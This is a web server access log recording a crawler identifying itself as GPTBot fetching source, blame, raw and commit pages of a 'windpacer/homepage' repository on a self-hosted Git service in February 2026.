"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 74.7.227.38] [Length 772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" +[17/Feb/2026:13:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" +[17/Feb/2026:13:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 74.7.227.38] [Length 11057] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 74.7.227.38] [Length 12745] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 74.7.227.38] [Length 10351] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" +[17/Feb/2026:13:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 74.7.227.38] [Length 11184] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" +[17/Feb/2026:13:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" [Client 74.7.227.38] [Length 11838] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:13:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 74.7.227.38] [Length 10953] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" +[17/Feb/2026:13:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 74.7.227.38] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" +[17/Feb/2026:13:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 74.7.227.38] [Length 10326] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" +[17/Feb/2026:13:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" +[17/Feb/2026:13:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 74.7.227.38] [Length 41653] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" +[17/Feb/2026:13:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" +[17/Feb/2026:13:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" [Client 74.7.227.38] [Length 9985] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" +[17/Feb/2026:13:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" +[17/Feb/2026:13:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 74.7.227.38] [Length 12445] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" +[17/Feb/2026:13:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" +[17/Feb/2026:13:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" +[17/Feb/2026:13:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 74.7.227.38] [Length 11358] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" +[17/Feb/2026:13:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" +[17/Feb/2026:13:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 74.7.227.38] [Length 10535] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" +[17/Feb/2026:13:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 74.7.227.38] [Length 10329] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" +[17/Feb/2026:13:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 74.7.227.38] [Length 12752] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10866] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" +[17/Feb/2026:13:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 74.7.227.38] [Length 10969] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 74.7.227.38] [Length 11964] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 7733877] [Gzip 11.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 74.7.227.38] [Length 11306] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:07:33 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 74.7.227.38] [Length 13931] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" +[17/Feb/2026:13:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15549] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" +[17/Feb/2026:13:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 74.7.227.38] [Length 11374] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13141] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" +[17/Feb/2026:13:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" +[17/Feb/2026:13:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 74.7.227.38] [Length 81793] [Gzip 50.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" +[17/Feb/2026:13:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 74.7.227.38] [Length 9908] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" +[17/Feb/2026:13:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 74.7.227.38] [Length 10142] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" +[17/Feb/2026:13:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 74.7.227.38] [Length 12446] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" +[17/Feb/2026:13:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" +[17/Feb/2026:13:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 74.7.227.38] [Length 10952] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" +[17/Feb/2026:13:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" +[17/Feb/2026:13:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" +[17/Feb/2026:13:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 74.7.227.38] [Length 9986] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" +[17/Feb/2026:13:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12936] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" +[17/Feb/2026:13:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 74.7.227.38] [Length 11849] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" +[17/Feb/2026:13:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" +[17/Feb/2026:13:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" +[17/Feb/2026:13:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" +[17/Feb/2026:13:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" +[17/Feb/2026:13:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26322] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:13:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 20952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 74.7.227.38] [Length 11260] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" +[17/Feb/2026:13:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 74.7.227.38] [Length 11674] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10738] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" +[17/Feb/2026:13:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 74.7.227.38] [Length 11668] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 74.7.227.38] [Length 11668] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" 